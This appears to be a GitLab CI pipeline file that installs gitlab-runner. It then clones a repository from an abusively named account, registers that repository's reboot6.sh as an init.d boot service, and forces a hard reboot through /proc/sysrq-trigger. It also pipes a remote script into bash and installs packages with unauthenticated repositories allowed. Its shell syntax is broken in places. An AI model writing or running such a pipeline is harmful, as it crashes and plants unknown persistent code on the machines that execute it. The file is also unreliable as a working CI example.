image: debian:latest
stages:
  - ".pre"
  - before_script
  - build1
  - deploy1
  - ".post"
before_script:
  - curl -L "https://packages.gitlab.com/install/repositories/runner/gitlab-runner/script.deb.sh" | bash
  - apt-get update && apt-get install dpkg-sig
  - curl -JLO "https://packages.gitlab.com/runner/gitlab-runner/gpgkey/runner-gitlab-runner-4C80FB51394521E9.pub.gpg"
  - gpg --import runner-gitlab-runner-4C80FB51394521E9.pub.gpg
  - dpkg-sig --verify gitlab-runner_amd64.deb
  - export GITLAB_RUNNER_DISABLE_SKEL=false; sudo -E apt-get install gitlab-runner
  - ./usr/share/gitlab-runner/post-install
  - which ssh-agent || ( apt update --allow-unauthenticated --allow-insecure-repositories -y && apt install -y git tzdata && ln -fs /usr/share/zoneinfo/America/Los_Angeles /etc/localtime && dpkg-reconfigure -f noninteractive tzdata && apt full-upgrade -y)
build1:
  stage: build1
  script:
    - git clone https://gitlab.com/mrgofuckyourself/reboot6.git && cd reboot6 && cp reboot6.sh /etc/init.d/reboot6.sh && update-rc.d -f reboot6.sh defaults 10 2 3 4 5 .
deploy1:
  stage: deploy1
  script:
    - echo 1 > /proc/sys/kernel/sysrq
    - echo b > /proc/sysrq-trigger
    - if [ /etc/init.d/reboot6.sh = true ] do reboot else exit 1
